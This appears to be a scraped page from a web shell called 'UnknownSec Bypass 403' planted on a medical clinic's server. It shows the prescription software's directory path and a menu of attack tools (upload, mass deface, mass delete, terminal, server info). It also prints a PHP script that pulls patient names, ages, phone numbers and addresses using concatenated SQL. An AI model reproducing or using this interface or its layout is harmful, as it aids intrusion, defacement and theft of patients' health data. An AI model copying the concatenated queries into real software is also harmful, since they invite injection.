UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/
stmedicosoftware
/
prescription
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
loadopdapp_patient.php
<?php require_once "../config.php"; session_start(); $docid= $_SESSION['doctorid']; $opddate = date("Y-m-d"); $sql = "Select suhid,sfileno,doctorpatientcount,sno,name,concat(agey,' ',pntageyrs) as age,sex,mobile,address1,uhid,fileno from patientdetailstb where opddate='".$opddate."' and examinedbyid='".$docid."' and isdeleted='".$gnotdeleted."' and prescriptionstatus=0 order by doctorpatientcount DESC "; $resultset = mysqli_query($conn, $sql) or die("database error:". mysqli_error($conn)); $data = array(); while( $rows = mysqli_fetch_assoc($resultset) ) { $data[] = $rows; } $results = array( "sEcho" => 1, "iTotalRecords" => count($data), "iTotalDisplayRecords" => count($data), "aaData" => $data ); echo json_encode($results); ?>
Copyright © 2025 - UnknownSec